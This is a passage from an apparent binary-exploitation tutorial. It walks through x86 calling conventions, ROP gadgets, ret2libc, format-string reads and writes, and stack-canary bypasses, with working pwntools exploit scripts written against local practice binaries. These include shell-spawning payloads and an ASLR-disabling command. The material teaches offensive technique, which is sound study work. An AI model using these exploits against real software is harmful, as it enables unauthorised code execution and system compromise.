│           0x08049166      83ec04         sub esp, 4
│           0x08049169      e886000000     call sym.__x86.get_pc_thunk.ax
│           0x0804916e      05922e0000     add eax, 0x2e92
│           0x08049173      817d08efbead.  cmp dword [arg_8h], 0xdeadbeef
│       ┌─< 0x0804917a      7516           jne 0x8049192
│       │   0x0804917c      83ec0c         sub esp, 0xc
│       │   0x0804917f      8d9008e0ffff   lea edx, [eax - 0x1ff8]
│       │   0x08049185      52             push edx
│       │   0x08049186      89c3           mov ebx, eax
│       │   0x08049188      e8a3feffff     call sym.imp.puts           ; int puts(const char *s)
│       │   0x0804918d      83c410         add esp, 0x10
│      ┌──< 0x08049190      eb14           jmp 0x80491a6
│      │└─> 0x08049192      83ec0c         sub esp, 0xc
│      │    0x08049195      8d900ee0ffff   lea edx, [eax - 0x1ff2]
│      │    0x0804919b      52             push edx
│      │    0x0804919c      89c3           mov ebx, eax
│      │    0x0804919e      e88dfeffff     call sym.imp.puts           ; int puts(const char *s)
│      │    0x080491a3      83c410         add esp, 0x10
│      │    ; CODE XREF from sym.vuln @ 0x8049190
│      └──> 0x080491a6      90             nop
│           0x080491a7      8b5dfc         mov ebx, dword [var_4h]
│           0x080491aa      c9             leave
└           0x080491ab      c3             ret

Here I'm showing the full output of the command because a lot of it is relevant. radare2 does a great job of detecting local variables - as you can see at the top, there is one called arg_8h. Later this same one is compared to 0xdeadbeef:

cmp dword [arg_8h], 0xdeadbeef

Clearly, that's our parameter.

So now we know, when there's one parameter, it gets pushed to the stack so that the stack looks like this:

return address        param_1

Analyzing 64-bit

Let's disassemble the main again here.

0x00401153      55             push rbp
0x00401154      4889e5         mov rbp, rsp
0x00401157      bfefbeadde     mov edi, 0xdeadbeef
0x0040115c      e8c1ffffff     call sym.vuln
0x00401161      bfdec0adde     mov edi, 0xdeadc0de
0x00401166      e8b7ffffff     call sym.vuln
0x0040116b      b800000000     mov eax, 0
0x00401170      5d             pop rbp
0x00401171      c3             ret

Hohoho, it's different. As we mentioned before, the parameter gets moved to rdi (in the disassembly here it's edi, but edi is just the lower 32 bits of rdi, and the parameter is only 32 bits long, so it says EDI instead). If we break on sym.vuln again we can check rdi with the command

dr rdi

Just dr will display all registers

[0x00401153]> db sym.vuln 
[0x00401153]> dc
hit breakpoint at: 401122
[0x00401122]> dr rdi
0xdeadbeef

Awesome.

Registers are used for parameters, but the return address is still pushed onto the stack and in ROP is placed right after the function address

Multiple Parameters

calling-convention-multi-param

Source

#include <stdio.h>

void vuln(int check, int check2, int check3) {
    if(check == 0xdeadbeef && check2 == 0xdeadc0de && check3 == 0xc0ded00d) {
        puts("Nice!");
    } else {
        puts("Not nice!");
    }
}

int main() {
    vuln(0xdeadbeef, 0xdeadc0de, 0xc0ded00d);
    vuln(0xdeadc0de, 0x12345678, 0xabcdef10);
}

32-bit

We've seen the full disassembly of an almost identical binary, so I'll only isolate the important parts.

0x080491dd      680dd0dec0     push 0xc0ded00d
0x080491e2      68dec0adde     push 0xdeadc0de
0x080491e7      68efbeadde     push 0xdeadbeef
0x080491ec      e871ffffff     call sym.vuln
[...]
0x080491f7      6810efcdab     push 0xabcdef10
0x080491fc      6878563412     push 0x12345678
0x08049201      68dec0adde     push 0xdeadc0de
0x08049206      e857ffffff     call sym.vuln

It's just as simple - push them in reverse order of how they're passed in. The reverse order becomes helpful when you db sym.vuln and print out the stack.

[0x080491bf]> db sym.vuln
[0x080491bf]> dc
hit breakpoint at: 8049162
[0x08049162]> pxw @ esp
0xffb45efc      0x080491f1 0xdeadbeef 0xdeadc0de 0xc0ded00d

So it becomes quite clear how more parameters are placed on the stack:

return pointer        param1        param2        param3        [...]        paramN
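The same layout falls out of a toy model of the call. In this sketch (our own helper, with a Python list standing in for the stack and index 0 playing the role of esp) the parameters are pushed right-to-left and the return address goes on last.

```python
def call(stack, return_address, *params):
    """Mimic a 32-bit call: push params right-to-left, then the return address."""
    for value in reversed(params):
        stack.insert(0, value)       # index 0 plays the role of esp
    stack.insert(0, return_address)
    return stack

stack = call([], 0x080491f1, 0xdeadbeef, 0xdeadc0de, 0xc0ded00d)

print([hex(value) for value in stack])
```

Reading from the top of the stack gives the return pointer first and then the parameters in their original order, just like the pxw output.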

64-bit

0x00401170      ba0dd0dec0     mov edx, 0xc0ded00d
0x00401175      bedec0adde     mov esi, 0xdeadc0de
0x0040117a      bfefbeadde     mov edi, 0xdeadbeef
0x0040117f      e89effffff     call sym.vuln
0x00401184      ba10efcdab     mov edx, 0xabcdef10
0x00401189      be78563412     mov esi, 0x12345678
0x0040118e      bfdec0adde     mov edi, 0xdeadc0de
0x00401193      e88affffff     call sym.vuln

So as well as rdi, we also load rsi and rdx (or, in this case, their lower 32 bits).

Bigger 64-bit values

Just to show that it is in fact ultimately rdi and not edi that is used, I will alter the original one-parameter code to utilize a bigger number:

#include <stdio.h>

void vuln(long check) {
    if(check == 0xdeadbeefc0ded00d) {
        puts("Nice!");
    }
}

int main() {
    vuln(0xdeadbeefc0ded00d);
}

If you disassemble the main, you can see it disassembles to

movabs rdi, 0xdeadbeefc0ded00d
call sym.vuln

movabs is how the disassembler writes a mov that loads a full 64-bit immediate value - treat it as if it's a mov.
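A quick bit of arithmetic shows why the compiler had to switch to the full register here. This is just a sketch with Python integers, with a mask standing in for the 32-bit edi.

```python
MASK_32 = 0xffffffff

value = 0xdeadbeefc0ded00d
small = 0xdeadbeef

low_half = value & MASK_32           # what edi alone would hold
fits_in_edi = (value == low_half)    # False: the top 32 bits would be lost
small_fits = (small == small & MASK_32)
```

0xdeadbeef fits in edi, but the larger value would be cut down to 0xc0ded00d, so rdi is used.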

Gadgets

Controlling execution with snippets of code

Gadgets are small snippets of code followed by a ret instruction, e.g. pop rdi; ret. We can manipulate the ret of these gadgets in such a way as to string together a large chain of them to do what we want.

Example

Let's for a minute pretend the stack looks like this during the execution of a pop rdi; ret gadget.

What happens is fairly obvious - 0x10 gets popped into rdi as it is at the top of the stack during the pop rdi. Once the pop occurs, rsp moves:

And since ret is equivalent to pop rip, 0x5655576724 gets moved into rip. Note how the stack is laid out for this.
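The two steps can be modelled with a Python list, where index 0 is wherever rsp points. This is only a sketch of the bookkeeping, using the two values from the example above.

```python
stack = [0x10, 0x5655576724]   # index 0 is where rsp points
registers = {}

# pop rdi: take the top value, rsp moves on
registers['rdi'] = stack.pop(0)

# ret, i.e. pop rip: the next value becomes the instruction pointer
registers['rip'] = stack.pop(0)
```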

Utilizing Gadgets

When we overwrite the return pointer, we overwrite the value pointed at by rsp. Once that value is popped, it points to the next value at the stack - but wait. We can overwrite the next value in the stack.

Let's say that we want to exploit a binary to jump to a pop rdi; ret gadget, pop 0x100 into rdi then jump to flag(). Let's step-by-step the execution.

On the original ret, which we overwrite the return pointer for, we pop the gadget address in. Now rip moves to point to the gadget, and rsp moves to the next memory address.

rsp moves to the 0x100; rip to the pop rdi. Now when we pop, 0x100 gets moved into rdi.

RSP moves to the next item on the stack, the address of the flag(). The ret is executed and flag() is called.

Summary

Essentially, if the gadget pops values from the stack, simply place those values afterward (including the pop rip in ret). If we want to pop 0x10 into rdi and then jump to 0x16, our payload would look like this:
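As a sketch, the part of the payload that starts at the saved return pointer could be built like this. The gadget address is hypothetical and only there for illustration, and the padding before the return pointer is left out.

```python
POP_RDI_RET = 0x4011db     # hypothetical gadget address, for illustration only

chain = POP_RDI_RET.to_bytes(8, 'little')   # overwrites the saved return pointer
chain += (0x10).to_bytes(8, 'little')       # popped into rdi
chain += (0x16).to_bytes(8, 'little')       # popped into rip by the gadget's ret

# Read it back as the 8-byte values the CPU will pop, in order
words = [int.from_bytes(chain[i:i + 8], 'little') for i in range(0, len(chain), 8)]
```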

Note if you have multiple pop instructions, you can just add more values.

We use rdi as an example because, if you remember, that's the register for the first parameter in 64-bit. This means control of this register using this gadget is important.

Finding Gadgets

We can use the tool ROPgadget to find possible gadgets.

$ ROPgadget --binary vuln-64

Gadgets information
============================================================
0x0000000000401069 : add ah, dh ; nop dword ptr [rax + rax] ; ret
0x000000000040109b : add bh, bh ; loopne 0x40110a ; nop ; ret
0x0000000000401037 : add byte ptr [rax], al ; add byte ptr [rax], al ; jmp 0x401024
[...]

Combine it with grep to look for specific registers.

$ ROPgadget --binary vuln-64 | grep rdi

0x0000000000401096 : or dword ptr [rdi + 0x404030], edi ; jmp rax
0x00000000004011db : pop rdi ; ret

Exploiting Calling Conventions

Utilizing Calling Conventions

exploiting_with_params

32-bit

The program expects the stack to be laid out like this before executing the function:

So why don't we provide it like that? As well as the function, we also pass the return address and the parameters.

Everything after the address of flag() will be part of the stack frame for the next function as it is expected to be there - just instead of using push instructions we just overwrote them manually.

from pwn import *

p = process('./vuln-32')

payload = b'A' * 52            # Padding up to EIP
payload += p32(0x080491c7)     # Address of flag()
payload += p32(0x0)            # Return address - don't care if crashes when done
payload += p32(0xdeadc0de)     # First parameter
payload += p32(0xc0ded00d)     # Second parameter

log.info(p.clean())
p.sendline(payload)
log.info(p.clean())

64-bit

Same logic, except we have to utilize the gadgets we talked about previously to fill the required registers (in this case rdi and rsi as we have two parameters).

We have to fill the registers before the function is called

from pwn import *

p = process('./vuln-64')

POP_RDI, POP_RSI_R15 = 0x4011fb, 0x4011f9


payload = b'A' * 56            # Padding
payload += p64(POP_RDI)        # pop rdi; ret
payload += p64(0xdeadc0de)     # value into rdi -> first param
payload += p64(POP_RSI_R15)    # pop rsi; pop r15; ret
payload += p64(0xc0ded00d)     # value into rsi -> second param
payload += p64(0x0)            # value into r15 -> not important
payload += p64(0x40116f)       # Address of flag()
payload += p64(0x0)

log.info(p.clean())
p.sendline(payload)
log.info(p.clean())
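To check that the chain does what the comments claim, we can walk through it with a tiny table-driven model. This is a sketch, not an emulator: GADGETS simply records which registers each gadget pops (taken from the comments in the exploit), and the padding is left out.

```python
POP_RDI, POP_RSI_R15, FLAG = 0x4011fb, 0x4011f9, 0x40116f

# Which registers each gadget pops before its ret
GADGETS = {POP_RDI: ['rdi'], POP_RSI_R15: ['rsi', 'r15']}

# Everything after the padding, in the order it sits on the stack
stack = [POP_RDI, 0xdeadc0de, POP_RSI_R15, 0xc0ded00d, 0x0, FLAG, 0x0]

registers = {}
rip = stack.pop(0)                 # the overwritten return pointer
while rip in GADGETS:
    for register in GADGETS[rip]:
        registers[register] = stack.pop(0)
    rip = stack.pop(0)             # the gadget's ret
```

When the loop ends, rip holds the address of flag() and both parameter registers are already filled, which is exactly the order the calling convention needs.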

ret2libc

The standard ROP exploit

A ret2libc is based on the system function found within the C library. This function executes anything passed to it, making it the best target. Another thing found within libc is the string /bin/sh; if you pass this string to system, it will pop a shell.

And that is the entire basis of it - passing /bin/sh as a parameter to system. Doesn't sound too bad, right?

ret2libc

Disabling ASLR

To start with, we are going to disable ASLR. ASLR randomizes the location of libc in memory, meaning we cannot (without other steps) work out the location of system and /bin/sh. To understand the general theory, we will start with it disabled.

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Manual Exploitation

Getting Libc and its base

Fortunately, Linux has a command called ldd for dynamic linking. If we run it on our compiled ELF file, it'll tell us the libraries it uses and their base addresses.

$ ldd vuln-32 
	linux-gate.so.1 (0xf7fd2000)
	libc.so.6 => /lib32/libc.so.6 (0xf7dc2000)
	/lib/ld-linux.so.2 (0xf7fd3000)

We need libc.so.6, so the base address of libc is 0xf7dc2000.

Libc base and the system and /bin/sh offsets may be different for you. This isn't a problem - it just means you have a different libc version. Make sure you use your values.

Getting the location of system()

To call system, we obviously need its location in memory. We can use the readelf command for this.

$ readelf -s /lib32/libc.so.6 | grep system

1534: 00044f00    55 FUNC    WEAK   DEFAULT   14 system@@GLIBC_2.0

The -s flag tells readelf to display the symbol table, which includes functions. Here we can see that the offset of system from the libc base is 0x44f00.

Getting the location of /bin/sh

Since /bin/sh is just a string, we can use strings on the dynamic library we just found with ldd. Note that when passing strings as parameters you need to pass a pointer to the string, not the hex representation of the string, because that's how C expects it.

$ strings -a -t x /lib32/libc.so.6 | grep /bin/sh
18c32b /bin/sh

-a tells it to scan the entire file; -t x tells it to output the offset in hex.
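Turning those three pieces of output into absolute addresses is just addition. The sketch below parses the example lines shown above (your values will probably differ) and adds the offsets to the libc base.

```python
LIBC_BASE = 0xf7dc2000    # from ldd; yours will probably differ

readelf_line = '1534: 00044f00    55 FUNC    WEAK   DEFAULT   14 system@@GLIBC_2.0'
strings_line = '18c32b /bin/sh'

system_offset = int(readelf_line.split()[1], 16)   # second column is the offset
binsh_offset = int(strings_line.split()[0], 16)    # first column is the offset

system = LIBC_BASE + system_offset
binsh = LIBC_BASE + binsh_offset

print(hex(system), hex(binsh))
```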

32-bit Exploit

from pwn import *

p = process('./vuln-32')

libc_base = 0xf7dc2000
system = libc_base + 0x44f00
binsh = libc_base + 0x18c32b

payload = b'A' * 76         # The padding
payload += p32(system)      # Location of system
payload += p32(0x0)         # return pointer - not important once we get the shell
payload += p32(binsh)       # pointer to command: /bin/sh

p.clean()
p.sendline(payload)
p.interactive()

64-bit Exploit

Repeat the process with the libc linked to the 64-bit binary (should be called something like /lib/x86_64-linux-gnu/libc.so.6).

Note that instead of passing the parameter in after the return pointer, you will have to use a pop rdi; ret gadget to put it into the RDI register.

$ ROPgadget --binary vuln-64 | grep rdi

[...]
0x00000000004011cb : pop rdi ; ret

from pwn import *

p = process('./vuln-64')

libc_base = 0x7ffff7de5000
system = libc_base + 0x48e20
binsh = libc_base + 0x18a143

POP_RDI = 0x4011cb

payload = b'A' * 72         # The padding
payload += p64(POP_RDI)     # gadget -> pop rdi; ret
payload += p64(binsh)       # pointer to command: /bin/sh
payload += p64(system)      # Location of system
payload += p64(0x0)         # return pointer - not important once we get the shell

p.clean()
p.sendline(payload)
p.interactive()

Automating with Pwntools

Unsurprisingly, pwntools has a bunch of features that make this much simpler.

# 32-bit
from pwn import *

elf = context.binary = ELF('./vuln-32')
p = process()

libc = elf.libc                        # Simply grab the libc it's running with
libc.address = 0xf7dc2000              # Set base address

system = libc.sym['system']            # Grab location of system
binsh = next(libc.search(b'/bin/sh'))  # grab string location

payload = b'A' * 76         # The padding
payload += p32(system)      # Location of system
payload += p32(0x0)         # return pointer - not important once we get the shell
payload += p32(binsh)       # pointer to command: /bin/sh

p.clean()
p.sendline(payload)
p.interactive()

The 64-bit looks essentially the same.

Pwntools can simplify it even more with its ROP capabilities, but I won't showcase them here.

Format String Bug

Reading memory off the stack

Format String is a dangerous bug that is easily exploitable. If manipulated correctly, you can leverage it to perform powerful actions such as reading from and writing to arbitrary memory locations.

Why it exists

In C, certain functions can take "format specifiers" within strings. Let's look at an example:

int value = 1205;

printf("Decimal: %d\nFloat: %f\nHex: 0x%x", value, (double) value, value);

This prints out:

Decimal: 1205
Float: 1205.000000
Hex: 0x4b5

So, it replaced %d with the value, %f with the float value and %x with the hex representation.

This is a nice way in C of formatting strings (string concatenation is quite complicated in C). Let's try printing out the same value in hex 3 times:

int value = 1205;

printf("%x %x %x", value, value, value);

As expected, we get

4b5 4b5 4b5

What happens, however, if we don't have enough arguments for all the format specifiers?

int value = 1205;

printf("%x %x %x", value);

4b5 5659b000 565981b0

Erm... what happened here?

The key here is that printf expects as many parameters as format string specifiers, and in 32-bit it grabs these parameters from the stack. If there aren't enough parameters on the stack, it'll just grab the next values - essentially leaking values off the stack. And that's what makes it so dangerous.

How to abuse this

Surely if it's a bug in the code, the attacker can't do much, right? Well, the real issue is when C code takes user-provided input and prints it out using printf.

fmtstr_arb_read

#include <stdio.h>

int main(void) {
    char buffer[30];
    
    gets(buffer);

    printf(buffer);
    return 0;
}

If we run this normally, it works as expected:

$ ./test 

yes
yes

But what happens if we input a format string specifier, such as %x?

$ ./test

%x %x %x %x %x
f7f74080 0 5657b1c0 782573fc 20782520

It reads values off the stack and returns them as the developer wasn't expecting so many format string specifiers.

Choosing Offsets

To print the same value 3 times, using

printf("%x %x %x", value, value, value);

Gets tedious - so, there is a better way in C.

printf("%1$x %1$x %1$x", value);

The 1$ between tells printf to use the first parameter. However, this also means that attackers can read values an arbitrary offset from the top of the stack - say we know there is a canary at the 6th %p - instead of sending %p %p %p %p %p %p, we can just do %6$p. This allows us to be much more efficient.
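The behaviour is easier to reason about with a toy model. The function below is not how printf is implemented; it is a sketch that only understands %x and %N$x, and reads its "arguments" from a list standing in for the values printf would find on the stack (here, the ones from the earlier output).

```python
import re

def toy_printf(fmt, stack):
    """Expand %x and %N$x by reading argument slots from 'stack', in order."""
    next_slot = 0

    def expand(match):
        nonlocal next_slot
        if match.group(1):                       # %N$x: explicit slot, 1-based
            value = stack[int(match.group(1)) - 1]
        else:                                    # %x: next unread slot
            value = stack[next_slot]
            next_slot += 1
        return format(value, 'x')

    return re.sub(r'%(?:(\d+)\$)?x', expand, fmt)

stack = [0x4b5, 0x5659b000, 0x565981b0]   # 'value', then whatever comes next

leak = toy_printf('%x %x %x', stack)          # walks past the one real argument
repeat = toy_printf('%1$x %1$x %1$x', stack)  # same slot three times
direct = toy_printf('%3$x', stack)            # jump straight to the third slot
```

The last call is the interesting one for an attacker: a single specifier reaches a slot that would otherwise take three.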

Arbitrary Reads

In C, when you want to use a string you use a pointer to the start of the string - this is essentially a value that represents a memory address. So when you use the %s format specifier, it's the pointer that gets passed to it. That means instead of reading a value off the stack, you read the value at the memory address it points to.

Now this is all very interesting - if you can find a value on the stack that happens to correspond to where you want to read, that is. But what if we could specify where we want to read? Well... we can.

Let's look back at the previous program and its output:

$ ./test

%x %x %x %x %x %x
f7f74080 0 5657b1c0 782573fc 20782520 25207825

You may notice that the last two values contain the hex values of %x . That's because we're reading the buffer. Here it's at the 4th offset - if we can write an address and then point %s at it, we can get an arbitrary read!

$ ./vuln 

ABCD|%6$p
ABCD|0x44434241

%p is a pointer; generally, it returns the same as %x just precedes it with a 0x which makes it stand out more
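If the hex values don't look like text to you yet, converting them back to bytes makes it obvious. The sketch below takes the last two leaked values from the first run and the value from the ABCD run and lays them out in little-endian order, as they sit in memory.

```python
leaked = [0x20782520, 0x25207825]   # last two values of the %x output

chunks = [value.to_bytes(4, 'little') for value in leaked]
echo = (0x44434241).to_bytes(4, 'little')

print(chunks, echo)
```

The chunks come out as pieces of our own "%x %x ..." input, and 0x44434241 turns back into ABCD.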

As we can see, we're reading the value we inputted. Let's write a quick pwntools script that writes the location of the ELF file and reads it with %s - if all goes well, it should read the first bytes of the file, which is always \x7fELF. Start with the basics:

from pwn import *

p = process('./vuln')

payload = p32(0x41424344)
payload += b'|%6$p'

p.sendline(payload)
log.info(p.clean())

$ python3 exploit.py

[+] Starting local process './vuln': pid 3204
[*] b'DCBA|0x41424344'

Nice, it works. The base address of the binary is 0x8048000, so let's replace the 0x41424344 with that and read it with %s:

from pwn import *

p = process('./vuln')

payload = p32(0x8048000)
payload += b'|%6$s'

p.sendline(payload)
log.info(p.clean())

It doesn't work.

The reason it doesn't work is that printf stops at null bytes, and the very first character is a null byte. We have to put the format specifier first.

from pwn import *

p = process('./vuln')

payload = b'%8$p||||'
payload += p32(0x8048000)

p.sendline(payload)
log.info(p.clean())

Let's break down the payload:

We add 4 | because we want the address we write to fill one memory address, not half of one and half another, because that will result in reading the wrong address
The offset is %8$p because the start of the buffer is generally at %6$p. However, memory addresses are 4 bytes long each and we already have 8 bytes, so it's two memory addresses further along at %8$p.
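
The offset arithmetic in that breakdown can be sketched in plain Python. This is an illustration under stated assumptions, not the pwntools API: a 32-bit target, the buffer starting at offset 6, and a prefix padded with | to 8 bytes. The function names address_offset and build_read_payload are hypothetical.

```python
import struct

WORD_SIZE = 4  # bytes per stack slot on a 32-bit target


def address_offset(buffer_offset: int, prefix_len: int) -> int:
    """Offset of the first stack slot that follows a prefix of prefix_len bytes."""
    if prefix_len % WORD_SIZE != 0:
        # A misaligned prefix would split the address across two slots.
        raise ValueError("prefix must fill whole stack slots")
    return buffer_offset + prefix_len // WORD_SIZE


def build_read_payload(address: int, buffer_offset: int = 6, prefix_len: int = 8) -> bytes:
    """Put the %s specifier first and the (possibly null-containing) address last."""
    offset = address_offset(buffer_offset, prefix_len)
    specifier = b"%" + str(offset).encode() + b"$s"
    if len(specifier) > prefix_len:
        raise ValueError("specifier does not fit in the prefix")
    prefix = specifier.ljust(prefix_len, b"|")  # pad with | up to the slot boundary
    return prefix + struct.pack("<I", address)


print(build_read_payload(0x8048000))
```

With the defaults this reproduces the layout used above: 8 bytes of specifier and padding, then the packed address in the slot at offset 8.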

$ python3 exploit.py

[+] Starting local process './vuln': pid 3255
[*] b'0x8048000||||'

It still stops at the null byte, but that's not important because we get the output; the address is still written to memory, just not printed back.

Now let's replace the p with an s.

$ python3 exploit.py

[+] Starting local process './vuln': pid 3326
[*] b'\x7fELF\x01\x01\x01||||'

Of course, %s will also stop at a null byte, as strings in C are terminated with them. We have worked out, however, that the first bytes of an ELF file up to a null byte are \x7fELF\x01\x01\x01.

Arbitrary Writes

Luckily C contains a rarely-used format specifier %n. This specifier takes in a pointer (memory address) and writes there the number of characters written so far. If we can control the input, we can control how many characters are written and also where we write them.

Obviously, there is a small flaw - to write, say, 0x8048000 to a memory address, we would have to write that many characters - and generally buffers aren't quite that big. Luckily there are other format string specifiers for that. I fully recommend you watch this video to completely understand it, but let's jump into a basic binary.

fmtstr_arb_write

#include <stdio.h>

int auth = 0;

int main() {
    char password[100];

    puts("Password: ");
    fgets(password, sizeof password, stdin);
    
    printf(password);
    printf("Auth is %i\n", auth);

    if(auth == 10) {
        puts("Authenticated!");
    }
}

Simple - we need to overwrite the variable auth with the value 10. The format string vulnerability is obvious, and there is no buffer overflow because fgets is bounded by the size of the buffer.

Work out the location of auth

As it's a global variable, it's within the binary itself. We can check the location using readelf to check for symbols.

$ readelf -s auth | grep auth
    34: 00000000     0 FILE    LOCAL  DEFAULT  ABS auth.c
    57: 0804c028     4 OBJECT  GLOBAL DEFAULT   24 auth

The location of auth is 0x0804c028.

Writing the Exploit

We're lucky there are no null bytes, so there's no need to change the order.

$ ./auth 

Password: 
%p %p %p %p %p %p %p %p %p
0x64 0xf7f9f580 0x8049199 (nil) 0x1 0xf7ff5980 0x25207025 0x70252070 0x20702520

Buffer is the 7th %p.

from pwn import *

AUTH = 0x804c028

p = process('./auth')

payload = p32(AUTH)
payload += b'|' * 6         # We need to write the value 10, AUTH is 4 bytes, so we need 6 more for %n
payload += b'%7$n'


print(p.clean().decode('latin-1'))
p.sendline(payload)
print(p.clean().decode('latin-1'))

And easy peasy:

[+] Starting local process './auth': pid 4045
Password: 

[*] Process './auth' stopped with exit code 0 (pid 4045)
(À\x04||||||
Auth is 10
Authenticated!
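
The reason this writes exactly 10 is that %n stores the number of characters printed so far. The sketch below rebuilds the same payload with the standard library and counts the bytes that come before the %n; it assumes everything before the specifier is literal text, and the helper name chars_before_specifier is made up for illustration.

```python
import struct

AUTH = 0x804c028  # address of auth, taken from the readelf output above

payload = struct.pack("<I", AUTH) + b"|" * 6 + b"%7$n"


def chars_before_specifier(data: bytes, specifier: bytes) -> int:
    """Count the bytes printf emits before it reaches the given specifier.

    Assumes the bytes before the specifier contain no other % conversions.
    """
    literal = data[: data.index(specifier)]
    if b"%" in literal:
        raise ValueError("prefix contains another conversion; count would be wrong")
    return len(literal)


# 4 address bytes + 6 padding bytes = the value %n will store
print(chars_before_specifier(payload, b"%7$n"))
```

Changing the number of padding bytes changes the value written, which is the basic knob that fmtstr_payload automates.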

Pwntools

As you can expect, pwntools has a handy feature for automating %n format string exploits:

payload = fmtstr_payload(offset, {location : value})

The offset in this case is 7 because the 7th %p read the buffer; the location is where you want to write it and the value is what. Note that you can add as many location-value pairs into the dictionary as you want.

payload = fmtstr_payload(7, {AUTH : 10})

You can also grab the location of the auth symbol with pwntools:

elf = ELF('./auth')
AUTH = elf.sym['auth']

Check out the pwntools tutorials for more cool features

Binary Exploitation - Stack

https://ir0nstone.gitbook.io/notes/

Stack Canaries

The Buffer Overflow defense

Stack Canaries are very simple - at the beginning of the function, a random value is placed on the stack. Before the program executes ret, the current value of that variable is compared to the initial: if they are the same, no buffer overflow has occurred.

If they are not, the attacker attempted to overflow to control the return pointer, and the program crashes, often with a ***stack smashing detected*** error message.

On Linux, stack canaries end in 00. This is so that they null-terminate any strings in case you make a mistake when using print functions, but it also makes them much easier to spot.

Bypassing Canaries

There are two ways to bypass a canary.

Leaking it

This is quite broad and will differ from binary to binary, but the main aim is to read the value. The simplest option is using format string if it is present - the canary, like other local variables, is on the stack, so if we can leak values off the stack it's easy.

Source

#include <stdio.h>

void vuln() {
    char buffer[64];

    puts("Leak me");
    gets(buffer);

    printf(buffer);
    puts("");

    puts("Overflow me");
    gets(buffer);
}

int main() {
    vuln();
}

void win() {
    puts("You won!");
}

The source is very simple - it gives you a format string vulnerability, then a buffer overflow vulnerability. The format string we can use to leak the canary value, then we can use that value to overwrite the canary with itself. This way, we can overflow past the canary but not trigger the check as its value remains constant. And of course, we just have to run win().

32-bit

canary-32

First, let's check if there is a canary:

$ pwn checksec vuln-32 
[*] 'vuln-32'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

Yup, there is. Now we need to work out the offset of the canary, and to do this we'll use radare2.

$ r2 -d -A vuln-32

[0xf7f2e0b0]> db 0x080491d7
[0xf7f2e0b0]> dc
Leak me
%p
hit breakpoint at: 80491d7
[0x080491d7]> pxw @ esp
0xffd7cd60  0xffd7cd7c 0xffd7cdec 0x00000002 0x0804919e  |...............
0xffd7cd70  0x08048034 0x00000000 0xf7f57000 0x00007025  4........p..%p..
0xffd7cd80  0x00000000 0x00000000 0x08048034 0xf7f02a28  ........4...(*..
0xffd7cd90  0xf7f01000 0xf7f3e080 0x00000000 0xf7d53ade  .............:..
0xffd7cda0  0xf7f013fc 0xffffffff 0x00000000 0x080492cb  ................
0xffd7cdb0  0x00000001 0xffd7ce84 0xffd7ce8c 0xadc70e00  ................

The last value there is the canary. We can tell because it's roughly 64 bytes after the "buffer start", which should be close to the end of the buffer. Additionally, it ends in 00 and looks very random, unlike the libc and stack addresses that start with f7 and ff. If we count the number of addresses it's around 24 until that value, so we go one before and one after as well to make sure.
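
The "ends in 00 and doesn't look like an address" reasoning can be written down as a rough filter. The sketch below is only a heuristic under stated assumptions: the words are copied from the dump above, the excluded top bytes (f7, ff, 08) are the ranges seen in this particular run, and word 0 at esp is assumed to be the format string pointer, so the list index lines up with the %N$p offset.

```python
# Words from the `pxw @ esp` dump above, in memory order starting at esp.
STACK_WORDS = [
    0xffd7cd7c, 0xffd7cdec, 0x00000002, 0x0804919e,
    0x08048034, 0x00000000, 0xf7f57000, 0x00007025,
    0x00000000, 0x00000000, 0x08048034, 0xf7f02a28,
    0xf7f01000, 0xf7f3e080, 0x00000000, 0xf7d53ade,
    0xf7f013fc, 0xffffffff, 0x00000000, 0x080492cb,
    0x00000001, 0xffd7ce84, 0xffd7ce8c, 0xadc70e00,
]

# Top bytes of libc, stack and binary addresses in this run (an assumption).
ADDRESS_TOP_BYTES = {0xf7, 0xff, 0x08}


def looks_like_canary(word: int) -> bool:
    """Heuristic: non-zero, lowest byte is 00, and not in a known address range."""
    return word != 0 and (word & 0xff) == 0 and (word >> 24) not in ADDRESS_TOP_BYTES


def canary_candidates(words):
    """Return the indexes of the words that pass the heuristic."""
    return [index for index, word in enumerate(words) if looks_like_canary(word)]


print(canary_candidates(STACK_WORDS))
```

A real canary can by chance start with one of the excluded bytes, so treat the result as a hint and confirm it by leaking the neighbouring offsets as well.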

$ ./vuln-32

Leak me
%23$p %24$p %25$p
0xa4a50300 0xf7fae080 (nil)

It appears to be at %23$p. Remember, stack canaries are randomized for each new process, so it won't be the same.

Now let's just automate grabbing the canary with pwntools:

from pwn import *

p = process('./vuln-32')

log.info(p.clean())
p.sendline(b'%23$p')

canary = int(p.recvline(), 16)
log.success(f'Canary: {hex(canary)}')

$ python3 exploit.py 
[+] Starting local process './vuln-32': pid 14019
[*] b'Leak me\n'
[+] Canary: 0xcc987300

Now all that's left is to work out what the offset is until the canary, and then the offset from after the canary to the return pointer.

$ r2 -d -A vuln-32
[0xf7fbb0b0]> db 0x080491d7
[0xf7fbb0b0]> dc
Leak me
%23$p
hit breakpoint at: 80491d7
[0x080491d7]> pxw @ esp
[...]
0xffea8af0  0x00000001 0xffea8bc4 0xffea8bcc 0xe1f91c00

We see the canary is at 0xffea8afc. A little later on the return pointer (we assume) is at 0xffea8b0c. Let's break just after the next gets() and check what value we overwrite it with (we'll use a De Bruijn pattern).

[0x080491d7]> db 0x0804920f
[0x080491d7]> dc
0xe1f91c00
Overflow me
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFA
hit breakpoint at: 804920f
[0x0804920f]> pxw @ 0xffea8afc
0xffea8afc  0x41574141 0x41415841 0x5a414159 0x41614141  AAWAAXAAYAAZAAaA
0xffea8b0c  0x41416241 0x64414163 0x41654141 0x41416641  AbAAcAAdAAeAAfAA

Now we can check the canary and EIP offsets:

[0x0804920f]> wopO 0x41574141
64
[0x0804920f]> wopO 0x41416241
80

The return pointer is 16 bytes after the canary start, so 12 bytes after the end of the canary.
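
The padding sizes follow directly from the two pattern offsets. As a small standard-library sketch (assuming a 4-byte canary on this 32-bit target; build_overflow is a hypothetical helper, not a pwntools function):

```python
import struct

CANARY_OFFSET = 64  # wopO result for the word sitting on the canary
RETURN_OFFSET = 80  # wopO result for the word sitting on the return pointer
WORD_SIZE = 4       # the canary is one 32-bit word


def build_overflow(canary: int, return_address: int) -> bytes:
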